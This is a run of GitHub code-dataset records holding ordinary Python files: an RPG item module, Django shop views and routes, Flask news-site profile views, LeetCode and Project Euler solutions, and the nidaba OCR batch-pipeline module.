__init__(self, name: str, description: str, weight: int, weapon_type: str, bonus: int):\n super(Weapon, self).__init__(name, description, weight)\n self.type: str = weapon_type\n self.bonus: str = bonus\n\n @property\n def draw_action(self) -> List[str]:\n if self.type == 'blade':\n return ['unsheathe', 'unsheathes']\n elif self.type == 'range':\n return [f'get an arrow and draw', 'gets an arrow and draws']\n elif self.type == 'blunt':\n return ['draw', 'draws']\n\n\nclass Shield(Item):\n '''\n CLASS used exclusively for Shields.\n '''\n\n def __init__(self, name: str, description: str, weight: int, bonus: int):\n super(Shield, self).__init__(name, description, weight)\n self.bonus: int = bonus\n\n\nclass Armor(Item):\n '''\n CLASS used exclusively for Armors.\n '''\n\n def __init__(self, name: str, description: str, weight: int, bonus: int):\n super(Armor, self).__init__(name, description, weight)\n self.bonus: int = bonus\n\n def on_taking(self) -> None:\n if self.container:\n print(\n f'You remove the armor from the {self.container}.')\n\n\n'''\n class Element(object):\n def __init__(self, name, description):\n self.name = name\n self.description = description\n\n on_looking =\n 'looking_effect': 'tired'\n\n 'on_searching': 'You spend a very long time searching the bushes and start to feel tired.',\n 'searching_effect': 'tired'\n\n'''\n","repo_name":"annabranco/old-school-rpg","sub_path":"core_elements/elements/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":8170,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"1368086298","text":"from itertools import product\nfrom django.shortcuts import render\nfrom .models import Category,Category2\nfrom .forms import Category2Form\n\n# Create your views here.\ndef shop(request):\n form = Category2Form(request.POST,request.FILES or None)\n if request.method == 'POST' and form.is_valid():\n form.save()\n products = Category2.objects.all()\n categories = Category.objects.all() \n return render (request,'shop.html',{'products':products, 'categories':categories,'form':form })\n\ndef ololo(request):\n form = Category2Form(request.POST or None)\n category = Category2.objects.all()\n if request.method == 'POST' and form.is_valid():\n form.save()\n return render (request,'shop.html',{'form':form })\n\n \n\n","repo_name":"iskander2/magazine2","sub_path":"shop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"75329520070","text":"from flask import render_template, redirect, g, request, jsonify, current_app, abort\n\nfrom info import constants, db\nfrom info.models import Category, News, User\nfrom info.modules.profile import profile_blu\nfrom info.utils.common import user_login_data\nfrom info.utils.image_storage import storage\nfrom info.utils.response_code import RET\n\n# 用户登陆\n# 用户基本信息\n# 密码修改\n# 收藏新闻\n# 关注粉丝\n# 新闻编辑\n#返回指定用户的发布新闻\n\n@profile_blu.route('/info')\n@user_login_data\ndef get_user_info():\n \"\"\"\n 获取用户信息\n 1. 获取到当前登录的用户模型\n 2. 返回模型中指定内容\n :return:\n \"\"\"\n user = g.user\n if not user:\n # 用户未登录,重定向到主页\n return redirect('/')\n data = {\n \"user\": user.to_dict(),\n }\n # 渲染模板\n return render_template(\"news/user.html\", data=data)\n\n\n@profile_blu.route('/base_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef base_info():\n \"\"\"\n 用户基本信息\n 1. 获取用户登录信息\n 2. 获取到传入参数\n 3. 更新并保存数据\n 4. 返回结果\n :return:\n \"\"\"\n # 1. 获取当前登录用户的信息\n user = g.user\n if request.method == \"GET\":\n return render_template('news/user_base_info.html', data={\"user\": user.to_dict()})\n # 如果是POST,代表是修改用户数据\n # 2. 获取到传入参数\n data_dict = request.json\n nick_name = data_dict.get(\"nick_name\")\n gender = data_dict.get(\"gender\")\n signature = data_dict.get(\"signature\")\n # 校验参数\n if not all([nick_name, signature, gender]):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数有误\")\n if gender not in (['MAN', 'WOMAN']):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数有误\")\n # 3. 更新并保存数据\n user.nick_name = nick_name\n user.gender = gender\n user.signature = signature\n\n # 4. 返回响应\n return jsonify(errno=RET.OK, errmsg=\"更新成功\")\n\n\n@profile_blu.route('/pic_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pic_info():\n user = g.user\n if request.method == \"GET\":\n return render_template('news/user_pic_info.html', data={\"user\": user.to_dict()})\n # 1. 获取到上传的文件\n try:\n avatar_file = request.files.get(\"avatar\").read()\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.PARAMERR, errmsg=\"读取文件出错\")\n\n # 2. 再将文件上传到七牛云\n try:\n key = storage(avatar_file)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.THIRDERR, errmsg=\"上传图片错误\")\n\n # 3. 将头像信息更新到当前用户的模型中\n\n # 设置用户模型相关数据\n user.avatar_url = key\n return jsonify(errno=RET.OK, errmsg=\"OK\", avatar_url=constants.QINIU_DOMIN_PREFIX)\n\n\n@profile_blu.route('/pass_info', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef pass_info():\n if request.method == \"GET\":\n return render_template('news/user_pass_info.html')\n # 1. 获取到传入参数\n old_password = request.json.get(\"old_password\")\n new_password = request.json.get(\"new_password\")\n if not all([old_password, new_password]):\n return jsonify(errno=RET.PARAMERR, errmsg=\"参数有误\")\n # 2. 获取当前登录用户的信息\n user = g.user\n if not user.check_passowrd(old_password):\n return jsonify(errno=RET.PWDERR, errmsg=\"原密码错误\")\n # 3.更新新密码数据\n user.password = new_password\n return jsonify(errno=RET.OK, errmsg=\"保存成功\")\n\n\n@profile_blu.route('/collection')\n@user_login_data\ndef user_collection():\n # 获取页数\n page = request.args.get(\"p\", 1)\n try:\n page = int(page)\n except Exception as e:\n current_app.logger.error(e)\n page = 1\n\n # 查询用户指定页数的收藏新闻\n user = g.user\n collections = []\n current_page = 1\n total_page = 1\n try:\n # 进行分页数据查询\n paginate = user.collection_news.paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n # 获取分页数据\n collections = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n # 收藏列表\n collection_dict_li = []\n for news in collections:\n collection_dict_li.append(news.to_basic_dict())\n\n data = {\"total_page\": total_page, \"current_page\": current_page, \"collections\": collection_dict_li}\n return render_template('news/user_collection.html', data=data)\n\n\n@profile_blu.route('/news_release', methods=[\"GET\", \"POST\"])\n@user_login_data\ndef news_release():\n if request.method == \"GET\":\n categories = []\n try:\n # 获取所有的分类数据\n categories = Category.query.all()\n except Exception as e:\n current_app.logger.error(e)\n\n # 定义列表保存分类数据\n categories_dicts = []\n\n for category in categories:\n # 获取字典\n cate_dict = category.to_dict()\n # 拼接内容\n categories_dicts.append(cate_dict)\n\n # 移除`最新`分类\n #categories_dicts.pop(0) #yuanshi\n # 返回内容\n return render_template('news/user_news_release.html', data={\"categories\": categories_dicts})\n\n # POST 提交,执行发布新闻操作\n\n # 1. 获取要提交的数据\n # 标题\n title = request.form.get(\"title\")\n # 新闻来源\n source = \"个人发布\"\n # 摘要\n digest = request.form.get(\"digest\")\n # 新闻内容\n content = request.form.get(\"content\")\n # 索引图片\n index_image = request.files.get(\"index_image\")\n # 分类id\n category_id = request.form.get(\"category_id\")\n key=''\n index_image_data=''\n # 1.1 判断数据是否有值\n # if not all([title, source, digest, content, index_image, category_id]):\n # return jsonify(errno=RET.PARAMERR, errmsg=\"参数有误\")\n\n # 1.2 判断参数\n try:\n category_id = int(category_id)\n except Exception as e:\n current_app.logger.error(e)\n print('categpry_id not same')\n print(e)\n #return jsonify(errno=RET.PARAMERR, errmsg=\"参数有误\")\n\n # 1.2 尝试读取图片\n try:\n index_image_data = index_image.read()\n except Exception as e:\n current_app.logger.error(e)\n print('picture save fail')\n print(e)\n pass\n #return jsonify(errno=RET.PARAMERR, errmsg=\"参数有误\")\n\n # 2. 将标题图片上传到七牛云\n try:\n key = storage(index_image_data)\n except Exception as e:\n current_app.logger.error(e)\n pass\n #return jsonify(errno=RET.THIRDERR, errmsg=\"上传图片错误\")\n\n # 3. 初始化新闻模型,并设置相关数据\n news = News()\n news.title = title\n news.digest = digest\n news.source = source\n news.content = content\n if key:\n try:\n news.index_image_url = constants.QINIU_DOMIN_PREFIX + key\n except:\n news.index_image_url='' \n news.category_id = category_id\n news.user_id = g.user.id\n # 1代表待审核状态\n news.status = 1\n print('ok')\n print(news.title,news.digest,news.source,news.content)\n # 4. 保存到数据库\n try:\n print('succes')\n db.session.add(news)\n db.session.commit()\n return jsonify(errno=RET.OK, errmsg=\"发布成功,等待审核\")\n except Exception as e:\n print('shibai')\n current_app.logger.error(e)\n db.session.rollback()\n return jsonify(errno=RET.DBERR, errmsg=\"保存数据失败\")\n # 5. 返回结果\n #return jsonify(errno=RET.OK, errmsg=\"发布成功,等待审核\")\n\n\n@profile_blu.route('/news_list')\n@user_login_data\ndef news_list():\n page = request.args.get(\"p\", 1)\n user = g.user\n news_li = []\n current_page = 1\n total_page = 1\n try:\n paginate = News.query.filter(News.user_id == user.id).paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n # 获取当前页数据\n news_li = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n news_dict_li = []\n for news in news_li:\n news_dict_li.append(news.to_review_dict())\n data = {\"news_list\": news_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n return render_template(\"news/user_news_list.html\", data=data)\n\n\n@profile_blu.route('/user_follow')\n@user_login_data\ndef user_follow():\n # 获取页数\n p = request.args.get(\"p\", 1)\n try:\n p = int(p)\n except Exception as e:\n current_app.logger.error(e)\n p = 1\n\n user = g.user\n\n follows = []\n current_page = 1\n total_page = 1\n try:\n paginate = user.followed.paginate(p, constants.USER_FOLLOWED_MAX_COUNT, False)\n # 获取当前页数据\n follows = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n\n user_dict_li = []\n\n for follow_user in follows:\n user_dict_li.append(follow_user.to_dict())\n data = {\"users\": user_dict_li, \"total_page\": total_page, \"current_page\": current_page}\n return render_template('news/user_follow.html', data=data)\n\n\n@profile_blu.route('/other_info')\n@user_login_data\ndef other_info():\n \"\"\"查看其他用户信息\"\"\"\n user = g.user\n # 获取其他用户id\n other_id = request.args.get(\"user_id\")\n if not other_id:\n abort(404)\n # 查询用户模型\n other = None\n try:\n other = User.query.get(other_id)\n except Exception as e:\n current_app.logger.error(e)\n if not other:\n abort(404)\n\n # 当前登录用户是否关注当前新闻作者\n is_followed = False\n if other and user:\n if other in user.followed:\n is_followed = True\n data = {\n \"user\": user.to_dict() if user else None,\n \"other_info\": other.to_dict(),\n \"is_followed\": is_followed\n }\n return render_template('news/other.html', data=data)\n\n\n@profile_blu.route('/other_news_list')\ndef other_news_list():\n \"\"\"返回指定用户的发布新闻\"\"\"\n # 1.获取参数\n other_id = request.args.get(\"user_id\")\n page = request.args.get(\"p\", 1)\n\n # 2.判断参数\n try:\n page = int(page)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(RET.PARAMERR, errmsg=\"参数错误\")\n\n try:\n other = User.query.get(other_id)\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(RET.NODATA, errmsg=\"数据库查询错误\")\n\n if not other:\n return jsonify(RET.USERERR, errmsg=\"用户不存在\")\n\n try:\n paginate = other.news_list.paginate(page, constants.USER_COLLECTION_MAX_NEWS, False)\n news_li = paginate.items\n # 获取当前页\n current_page = paginate.page\n # 获取总页数\n total_page = paginate.pages\n except Exception as e:\n current_app.logger.error(e)\n return jsonify(errno=RET.DBERR, errmsg=\"数据查询错误\")\n\n news_dict_li = []\n\n for news_item in news_li:\n news_dict_li.append(news_item.to_review_dict())\n data = {\n \"news_list\": news_dict_li,\n \"total_page\": total_page,\n \"current_page\": current_page\n }\n return jsonify(errno=RET.OK, errmsg=\"OK\", data=data)","repo_name":"abinsun/Flask-Web","sub_path":"info/modules/profile/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":11767,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"20117830146","text":"# https://leetcode.com/problems/lowest-common-ancestor-of-a-binary-tree/\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution:\n def lowestCommonAncestor(self, root, p, q):\n \"\"\"\n :type root: TreeNode\n :type p: TreeNode\n :type q: TreeNode\n :rtype: TreeNode\n \"\"\"\n def find_common_ancestor(root):\n # Base case\n if not root:\n return (False, False, None)\n\n # Left subtree\n (lpFound, lqFound, lca) = find_common_ancestor(root.left)\n if lca:\n return (True, True, lca)\n\n # Right subtree\n (rpFound, rqFound, rca) = find_common_ancestor(root.right)\n if rca:\n return (True, True, rca)\n\n # Root\n pFound = lpFound or rpFound or root.val == p.val\n qFound = lqFound or rqFound or root.val == q.val\n\n if pFound and qFound:\n return (True, True, root)\n else:\n return (pFound, qFound, None)\n\n (_, _, lca) = find_common_ancestor(root)\n return lca\n","repo_name":"maswin/leet-code-practice","sub_path":"lowest_common_ancestor.py","file_name":"lowest_common_ancestor.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36262448777","text":"# Completed\n\"\"\"\n Problem 31\n ==========\n \n \n In England the currency is made up of pound, £, and pence, p, and there\n are eight coins in general circulation:\n \n 1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p).\n \n It is possible to make £2 in the following way:\n \n 1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p\n \n How many different ways can £2 be made using any number of coins?\n \n \n Answer: 142dfe4a33d624d2b830a9257e96726d\n\"\"\"\nfrom common import check\n\nPROBLEM_NUMBER = 31\nANSWER_HASH = \"142dfe4a33d624d2b830a9257e96726d\"\nCOINS = [200, 100, 50, 20, 10, 5, 2, 1]\n\ndef get_permutations(value, coins):\n if len(coins) == 0:\n return None\n coin = coins[0]\n if len(coins) == 1:\n if value % coin == 0:\n yield { coin : value // coin } \n else:\n return None\n else:\n amount = 0\n while value >= 0:\n for permutation in (p for p in get_permutations(value, coins[1:]) if p is not None):\n permutation.update({ coin : amount })\n yield permutation\n amount += 1\n value -= coin\n\nresult = len(list(get_permutations(200, COINS)))\ncheck(result, PROBLEM_NUMBER, ANSWER_HASH)\n","repo_name":"ThomasJackDalby/project-euler","sub_path":"solutions/python/031.py","file_name":"031.py","file_ext":"py","file_size_in_byte":1246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"16936735576","text":"from django.urls import path, include\nfrom django.conf.urls.static import static\nfrom project import settings\nfrom . import views\n\nurlpatterns = [\n path(\"personal\", views.personal, name=\"personal\"),\n path(\"contact\", views.contact , name=\"contact\"),\n path(\"academy\", views.academy , name=\"academy\"),\n path(\"document\", views.document , name=\"document\"),\n path(\"wishlist\", views.wishlist , name=\"wishlist\"),\n path(\"sgnin\", views.sgnin , name=\"sgnin\"),\n path(\"students\", views.students ,name=\"students\"),\n path(\"studentsdesirs\", views.studentsdesirs ,name=\"studentsdesirs\"),\n]\n\nif settings.DEBUG:\n urlpatterns += static(settings.MEDIA_URL,document_root=settings.MEDIA_ROOT)","repo_name":"abd-naj/test-django","sub_path":"pages/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72834113991","text":"# -*- coding: utf-8 -*-\n\"\"\"\nnidaba.nidaba\n~~~~~~~~~~~~~\n\nThe public API of nidaba. External applications should exclusively use the\nobjects and methods defined here.\n\"\"\"\n\nfrom __future__ import unicode_literals, print_function, absolute_import\n\nfrom nidaba.nidabaexceptions import (NidabaInputException,\n NidabaNoSuchAlgorithmException,\n NidabaTickException, NidabaStepException)\n\nfrom celery import chord, chain\nfrom inspect import getcallargs\nfrom collections import OrderedDict, Iterable\nfrom requests_toolbelt.multipart import encoder\nfrom redis import WatchError\n\nimport os\nimport json\nimport uuid\nimport requests\nimport itertools\n\n\ndef task_arg_validator(arg_values, **kwargs):\n \"\"\"\n Validates keyword arguments against the list of valid argument values\n contained in the task definition.\n\n Raises:\n NidabaInputException if validation failed.\n \"\"\"\n kwc = kwargs.copy()\n\n def _val_single_arg(arg, type):\n if type == 'float':\n if not isinstance(val, float) and not isinstance(val, int):\n raise NidabaInputException('{} is not a float'.format(val))\n elif type == 'int':\n if not isinstance(val, int):\n raise NidabaInputException('{} is not an int'.format(val))\n elif type == 'str':\n if not isinstance(val, basestring):\n raise NidabaInputException('{} is not a string'.format(val))\n # XXX: Add file/files checker for local case\n elif type == 'file':\n pass\n elif type == 'files':\n pass\n else:\n raise NidabaInputException('Argument type {} unknown'.format(type))\n\n for k, v in arg_values.iteritems():\n try:\n val = kwc.pop(k)\n except:\n raise NidabaInputException('Missing argument: {}'.format(k))\n if isinstance(v, tuple):\n if not isinstance(val, type(v[0])):\n raise NidabaInputException('{} of different type than range fields'.format(val))\n if val < v[0] or val > v[1]:\n raise NidabaInputException('{} outside of allowed range {}-{}'.format(val, *v))\n elif isinstance(v, list):\n if isinstance(val, Iterable) and not isinstance(val, basestring):\n va = set(val)\n else:\n va = set([val])\n if not set(v).issuperset(va):\n raise NidabaInputException('{} not in list of valid values'.format(val))\n else:\n _val_single_arg(val, v)\n\n if kwc:\n raise NidabaInputException('Superfluous arguments present')\n\n\nclass Batch(object):\n\n \"\"\"\n Creates a series of celery tasks OCRing a set of documents (among other\n things).\n\n \"\"\"\n\n def __init__(self, id=None):\n # stuff depending on a valid configuration\n from nidaba import storage\n from nidaba import config\n self.storage = storage\n\n # slowly importing stuff\n from nidaba import tasks\n from nidaba import plugins\n from nidaba import celery\n self.task_reg = tasks\n self.celery = celery\n\n self.id = id\n if self.id is None:\n self.id = uuid.uuid4().get_hex()\n self.storage.prepare_filestore(self.id)\n if not self.storage.is_valid_job(self.id):\n raise NidabaInputException('Storage not prepared for task')\n\n self.docs = []\n self.scratchpad = {}\n self.redis = config.Redis\n\n self.tasks = OrderedDict([('img', []),\n ('binarize', []),\n ('segmentation', []),\n ('ocr', []),\n ('stats', []),\n ('postprocessing', []),\n ('output', []),\n ('archive', [])])\n\n # defines if tasks in a group are run in parallel or in sequence and their merge mode\n self.order = {'img': ('sequence', False),\n 'binarize': ('parallel', False),\n 'segmentation': ('parallel', False),\n 'ocr': ('parallel', False),\n 'stats': ('parallel', False),\n 'postprocessing': ('sequence', 'doc'),\n 'output': ('sequence', False),\n 'archive': ('parallel', True)}\n\n self.lock = False\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n if 'scratchpad' not in self.scratchpad:\n self.lock = True\n pipe.execute()\n break\n except WatchError:\n continue\n\n def _restore_and_create_scratchpad(self, pipe):\n \"\"\"\n Restores the scratchpad or creates one if none exists. Does not create\n a scratchpad on an already executed task.\n \"\"\"\n scratch = pipe.get(self.id)\n if scratch is not None:\n scratch = json.loads(scratch)\n if 'scratchpad' in scratch:\n self.scratchpad = scratch\n for k, v in self.scratchpad['scratchpad'].iteritems():\n setattr(self, k, v)\n # reorder task definitions\n else:\n self.scratchpad = {'scratchpad': {'docs': self.docs,\n 'tasks': self.tasks}}\n pipe.set(self.id, json.dumps(self.scratchpad))\n\n def get_state(self):\n \"\"\"\n Retrieves the current state of a batch.\n\n Returns:\n (unicode): A string containing one of the following states:\n\n NONE: The batch ID is not registered in the backend.\n FAILURE: Batch execution has failed.\n PENDING: The batch is currently running.\n SUCCESS: The batch has completed successfully.\n \"\"\"\n batch = self.redis.get(self.id)\n try:\n batch = json.loads(batch)\n except Exception:\n return u'NONE'\n if 'scratchpad' in batch:\n return u'NONE'\n st = 'SUCCESS'\n for subtask in batch.itervalues():\n if subtask['state'] == 'PENDING' or subtask['state'] == 'RUNNING':\n st = u'PENDING'\n if subtask['state'] == 'FAILURE':\n return u'FAILURE'\n return st\n\n def get_errors(self):\n \"\"\"\n Retrieves all errors of the batch.\n\n Returns:\n list: A list of tuples containing keyword arguments to the task, a\n dictionary containing debug tracking information (i.e. variables\n which are given to the tasks as keyword arguments but aren't\n arguments to the underlying function), and the exception message of\n the failure.\n \"\"\"\n batch = self.redis.get(self.id)\n try:\n batch = json.loads(batch)\n except:\n return None\n errors = []\n for subtask in batch.itervalues():\n if subtask['state'] == 'FAILURE':\n errors.append(subtask)\n return errors\n\n def get_results(self):\n \"\"\"\n Retrieves the storage tuples of a successful batch.\n\n Returns:\n \"\"\"\n batch = self.redis.get(self.id)\n try:\n batch = json.loads(batch)\n except Exception:\n return None\n\n outfiles = []\n for subtask in batch.itervalues():\n if len(subtask['children']) == 0 and subtask['result'] is not None:\n outfiles.append((subtask['result'], subtask['root_documents']))\n return outfiles\n\n def get_extended_state(self):\n \"\"\"\n Returns extended batch state information.\n\n Returns:\n A dictionary containing an entry for each subtask.\n \"\"\"\n state = json.loads(self.redis.get(self.id))\n if 'scratchpad' in state:\n return []\n else:\n return state\n\n def get_available_tasks(self):\n \"\"\"\n Returns all available tasks and their valid argument values.\n\n The return value is an ordered dictionary containing an entry for each\n group with a sub-dictionary containing the task identifiers and valid\n argument values.\n \"\"\"\n tasks = OrderedDict()\n for task, fun in self.celery.app.tasks.iteritems():\n try:\n _, group, method = task.split('.')\n except:\n continue\n if group == 'util':\n continue\n if group not in tasks:\n tasks[group] = {}\n kwargs = fun.get_valid_args()\n tasks[group][method] = kwargs\n return tasks\n\n def get_tasks(self):\n \"\"\"\n Returns the simplified task definition either from the scratchpad or\n from the pipeline when already in execution.\n \"\"\"\n entry = json.loads(self.redis.get(self.id))\n if 'scratchpad' in entry:\n scratch = json.loads(self.redis.get(self.id))\n if 'simple_tasks' in scratch['scratchpad']:\n return scratch['scratchpad']['simple_tasks']\n else:\n return {}\n else:\n state = self.get_extended_state()\n tasks = OrderedDict([('img', []),\n ('binarize', []),\n ('segmentation', []),\n ('ocr', []),\n ('stats', []),\n ('postprocessing', []),\n ('output', []),\n ('output', [])])\n\n for task in state.itervalues():\n if task['task'][0] in tasks:\n tasks[task['task'][0]].append(task['task'])\n return tasks\n\n def get_documents(self):\n \"\"\"\n Returns the list of input document for this task.\n \"\"\"\n entry = json.loads(self.redis.get(self.id))\n if 'scratchpad' in entry:\n return entry['scratchpad']['docs']\n else:\n state = self.get_extended_state()\n docs = []\n for task in state.itervalues():\n for doc in task['root_documents']:\n if doc not in docs and isinstance(doc[0], basestring):\n docs.append(doc)\n return docs\n\n def is_running(self):\n \"\"\"\n Returns True if the batch's run() method has been successfully called, otherwise False.\n \"\"\"\n return self.lock\n\n def add_document(self, doc):\n \"\"\"Add a document to the batch.\n\n Adds a document tuple to the batch and checks if it exists.\n\n Args:\n doc (tuple): A standard document tuple.\n\n Raises:\n NidabaInputException: The document tuple does not refer to a file.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n\n if not self.storage.is_file(*doc):\n raise NidabaInputException('Input document is not a file.')\n\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.docs.append(doc)\n self.scratchpad['scratchpad']['docs'] = self.docs\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n\n def rm_document(self, doc):\n \"\"\"Removes a document from the (unexecuted) batch.\n\n Removes a document tuple from the batch.\n\n Args:\n doc (tuple): A standard document tuple.\n\n Raises:\n NidabaInputException: The document tuple does not refer to a file.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.docs.remove(list(doc))\n self.scratchpad['scratchpad']['docs'] = self.docs\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n except ValueError:\n raise NidabaInputException('Document not part of the batch')\n\n def add_task(self, group, method, **kwargs):\n \"\"\"Add a task.\n\n Adds a ``task``, a single executable task gathering one or more input\n documents and returning a single output document, to the current tick.\n Multiple jobs are run in parallel.\n\n Args:\n group (unicode): A task group identifier\n method (unicode): A task identifier\n **kwargs: Arguments to the task\n\n Raises:\n NidabaInputException: Trying to modify executed task.\n NidabaNoSuchAlgorithmException: Invalid method given.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task group {}'.format(group))\n if u'nidaba.{}.{}'.format(group, method) not in self.celery.app.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task {} {}'.format(group, method))\n task = self.celery.app.tasks[u'nidaba.{}.{}'.format(group, method)]\n # validate arguments first against getcallargs\n try:\n getcallargs(task.run, ('', ''), **kwargs)\n except TypeError as e:\n raise NidabaInputException(str(e))\n # validate against arg_values field of the task\n task_arg_validator(task.get_valid_args(), **kwargs)\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.tasks[group].append((method, kwargs))\n self.scratchpad['scratchpad']['simple_tasks'] = self.tasks\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n\n def rm_task(self, group, method, **kwargs):\n \"\"\"Removes a task from the (unexecuted) batch.\n\n Removes a task from the batch.\n\n Args:\n group (unicode): A task group identifier\n method (unicode): A task identifier\n **kwargs: Arguments to the task\n\n Raises:\n NidabaInputException: Trying to modify executed task.\n NidabaNoSuchAlgorithmException: Invalid method given.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n # validate that the task exists\n if group not in self.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task group {}'.format(group))\n if u'nidaba.{}.{}'.format(group, method) not in self.celery.app.tasks:\n raise NidabaNoSuchAlgorithmException('Unknown task {} {}'.format(group, method))\n task = self.celery.app.tasks[u'nidaba.{}.{}'.format(group, method)]\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n self.tasks[group].remove([method, kwargs])\n self.scratchpad['scratchpad']['simple_tasks'] = self.tasks\n pipe.set(self.id, json.dumps(self.scratchpad))\n pipe.execute()\n break\n except WatchError:\n continue\n except ValueError:\n raise NidabaInputException('Task not part of the batch')\n\n def run(self):\n \"\"\"Executes the current batch definition.\n\n Expands the current batch definition to a series of celery chains and\n executes them asynchronously. Additionally a batch record is written to\n the celery result backend.\n\n Returns:\n (unicode): Batch identifier.\n \"\"\"\n if self.lock:\n raise NidabaInputException('Executed batch may not be modified')\n\n # resync batch before execution\n with self.redis.pipeline() as pipe:\n while(1):\n try:\n pipe.watch(self.id)\n self._restore_and_create_scratchpad(pipe)\n\n # reorder task definitions\n keys = ['img', 'binarize', 'segmentation', 'ocr', 'stats', 'postprocessing', 'output', 'archive']\n tasks = OrderedDict((key, self.tasks[key]) for key in keys)\n first = []\n prev = None\n result_data = {}\n self.lock = True\n \n # build chain\n root_docs = sorted(self.docs, key=lambda x: x[1])\n prev = []\n for group, step in tasks.iteritems():\n # skip groups without tasks\n if not step:\n continue\n sequential = True if self.order[group][0] == 'sequence' else False\n mmode = self.order[group][1]\n \n def _repeat(lst, n):\n return list(itertools.chain.from_iterable(itertools.repeat(x, n) for x in lst))\n \n if sequential:\n step = [step]\n # multiply number of tasks in this step by number of tasks in\n # previous step if not merging\n if not mmode:\n step = _repeat(step, len(root_docs))\n root_docs = root_docs * (len(step) / len(root_docs))\n # by number of root docs if doc merging\n elif mmode == 'doc':\n step = _repeat(step, len(self.docs))\n root_docs = self.docs\n else:\n root_docs = [root_docs] * len(step)\n if not sequential:\n step = [[x] for x in step]\n nprev = []\n r = []\n for rd_idx, (rdoc, c) in enumerate(zip(root_docs, step)):\n if sequential:\n r.append([])\n for idx, (fun, kwargs) in enumerate(c):\n # if idx > 0 (sequential == true) parent is previous task in sequence\n if idx > 0:\n parents = [task_id]\n # if merge mode is 'doc' base parents are tasks n * (len(prev)/len(docs)) to n+1 ...\n elif mmode == 'doc':\n parents = prev[rd_idx::len(root_docs)]\n # if merging everything all tasks in previous step are parents\n elif mmode:\n parents = prev\n # if not merging a single task in previous step is the parent\n elif mmode is False:\n parents = [prev[rd_idx % len(prev)]] if prev else prev\n task_id = uuid.uuid4().get_hex()\n # last task in a sequence is entered into new prev array\n if idx + 1 == len(c):\n nprev.append(task_id)\n result_data[task_id] = {'children': [],\n 'parents': parents,\n 'root_documents': rdoc if mmode else [rdoc],\n 'state': 'PENDING',\n 'result': None,\n 'task': (group, fun, kwargs)}\n for parent in parents:\n result_data[parent]['children'].append(task_id)\n task = self.celery.app.tasks[u'nidaba.{}.{}'.format(group, fun)]\n if sequential:\n r[-1].append(task.s(batch_id=self.id, task_id=task_id, **kwargs))\n else:\n r.append(task.s(batch_id=self.id, task_id=task_id, **kwargs))\n prev = nprev\n t = self.celery.app.tasks[u'nidaba.util.barrier'].s(merging=mmode, sequential=sequential, replace=r, root_docs=self.docs)\n first.append(t)\n\n pipe.set(self.id, json.dumps(result_data))\n chain(first).apply_async(args=[self.docs])\n break\n except WatchError:\n continue\n return self.id\n\n\nclass NetworkSimpleBatch(object):\n \"\"\"\n A SimpleBatch object providing the same interface as a SimpleBatch.\n\n It does some basic error checking to minimize network traffic but it won't\n catch all errors before issuing API requests, especially if the batch is\n modified by another process. In these cases exceptions will be raised by\n the ``requests`` module.\n \"\"\"\n def __init__(self, host, id=None):\n self.id = id\n self.host = host\n self.lock = False\n 